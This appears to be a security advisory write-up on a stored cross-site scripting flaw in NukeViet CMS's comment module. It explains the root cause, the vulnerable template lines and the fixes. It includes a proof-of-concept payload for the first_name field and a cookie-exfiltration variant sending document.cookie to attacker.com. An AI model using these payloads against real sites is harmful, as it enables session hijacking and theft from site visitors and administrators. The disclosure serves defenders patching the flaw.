Listen to this Post
How CVE-2026-41147 Works
NukeViet CMS versions 4.x through 4.5.08 contain a stored cross-site scripting (XSS) vulnerability arising from improper output encoding in the comment module. The root cause lies in the `{COMMENT.post_name}` template variable, which is interpolated without JavaScript-context escaping into an inline `onclick` handler.
The `first_name` and `last_name` profile fields are sanitized using `Request::_get_()` with $specialchars = true, which converts characters like `’` to ', `(` to (, `)` to ), and `/` to /. While this HTML numeric character reference encoding is appropriate for HTML element content and quoted HTML attribute values, it is insufficient for a JavaScript string literal embedded within an HTML attribute.
Browsers decode HTML entities in attribute values before the JavaScript engine parses the string. Consequently, `’` is decoded back to ', which prematurely terminates the JavaScript string and allows the remainder of the value to execute as arbitrary JavaScript. The combined display name—constructed via nv_show_name_user(first_name, last_name)—reaches the template, providing an attacker with up to approximately 200 encoded characters across both fields.
Several default configuration settings facilitate exploitation. `captcha_area_comm` defaults to 1, meaning no CAPTCHA is required for logged-in users. `auto_postcomm` is enabled, so comments are published immediately without moderation. `active_editinfo_censor` defaults to 0, allowing profile edits to take effect without admin review. The Content Security Policy (CSP) includes 'unsafe-inline', permitting inline `onclick` handlers to execute normally. Any registered member can set the payload and post a comment with no additional steps. If `captcha_area_comm` is set to 0, the `name` field of anonymous comments is processed by the same `get_(…, 1)` call, making exploitation possible without authentication.
The vulnerability has been assigned a CVSS 3.1 base score of 8.7 (High) by GitHub, Inc., with the vector: AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N.
DailyCVE Form
| Field | Answer |
|-|–|
| Platform | NukeViet CMS |
| Version | 4.x through 4.5.08 |
| Vulnerability | Stored Cross-Site Scripting (XSS) |
| Severity | High (CVSS 8.7) |
| Date | May 15, 2026 |
| Prediction | Already patched (v4.5.08+) |
What Undercode Say: Analytics
Affected Component Analysis:
– `themes/default/modules/comment/comment.tpl` — line 27 (top-level comments)
– `themes/default/modules/comment/comment.tpl` — line 64 (nested/reply comments)
Vulnerable Code Pattern:
onclick="nv_commment_feedback(event, {COMMENT.cid}, '{COMMENT.post_name}')"
Sanitization Function:
Request::<em>get</em>($input, $specialchars = true)
Converts:
– `’` → `’`
– `(` → `(`
– `)` → `)`
– `/` → `/`
Exploitation Conditions (Default):
| Condition | Default Value | Effect |
|–||–|
| `captcha_area_comm` | 1 | No CAPTCHA for logged-in users |
| `auto_postcomm` | enabled | Comments published immediately |
| `active_editinfo_censor` | 0 | Profile edits take effect immediately |
| CSP `script-src` | `’unsafe-inline’` | Inline onclick handlers execute |
Exploit
Proof of Concept Payload:
Set `first_name` to the following value in profile settings (/index.php?nv=users&op=editinfo), then post any comment:
a');alert(document.domain);//
Stored Value:
a');alert(document.domain);//
Rendered Output When Victim Clicks Reply:
nv_commment_feedback(event, 1, 'a');alert(document.domain);// Tester')
Data Exfiltration Variant (split across both name fields):
// first_name: a');window.location='https://attacker.com/steal?cookie='+document.cookie;//
// last_name: ;alert('stolen');//
Navigates the victim’s browser to an attacker-controlled URL carrying `document.cookie` as a query parameter.
Anonymous Exploitation (if `captcha_area_comm = 0`):
The `name` field of anonymous comments (modules/comment/funcs/post.php) is processed by the same `get_(…, 1)` call.
Server-Side Filter Bypass:
The application relies primarily on client-side filtering, which can be bypassed by intercepting and modifying HTTP requests directly (e.g., using Burp Suite).
Protection
Preferred Fix:
Remove `post_name` from the inline handler entirely. Pass only `cid` to `nv_commment_feedback` and have the function retrieve the display name from the already-rendered DOM (e.g., the adjacent `` element).
Alternative Fix:
If the value must be passed inline, encode it with `json_encode($post_name)` (PHP) so that the output is a properly escaped JavaScript string literal. HTML numeric character references must not be relied upon for JavaScript string escaping.
Upgrade:
Upgrade to NukeViet version >= 4.5.08 or >= 4.6.00.
Workarounds:
- Implement server-side HTML sanitization in the `Request` class to strip or encode dangerous tags and attributes (e.g.,
<iframe>,srcdoc, event handlers such asonerror,onload) - Apply a Content Security Policy (CSP) header to restrict inline script execution
- Ensure cookies are set with the `HttpOnly` flag to mitigate cookie theft via XSS
Audit Recommendation:
Other locations in the codebase using the same pattern (get_(..., $specialchars=true) inside JavaScript string literals within HTML attributes) should be audited.
Impact
An attacker with a regular user account can execute arbitrary JavaScript in the browser of any visitor who interacts with the Reply button on their comment, including site administrators.
Practical Consequences:
| Impact | Description |
|–|-|
| Privilege Escalation | Admin session hijacking — forging administrative actions (content modification, account manipulation) in the context of an authenticated admin |
| Credential Phishing | Injecting a fake login form into the page |
| Data Exfiltration | Reading page content and non-HttpOnly cookies |
| Defacement | Modifying page content or redirecting to phishing pages |
| Phishing Attacks | Manipulated email notifications |
Note: NukeViet session cookies carry the `HttpOnly` flag, so they are not directly readable via document.cookie; however, the above attack vectors remain fully viable.
References:
- CWE-79: Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’)
- CWE-116: Improper Encoding or Escaping of Output
- OWASP: Cross Site Scripting Prevention — Rule 2: Attribute Encoding is Not Sufficient for JS Contexts
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

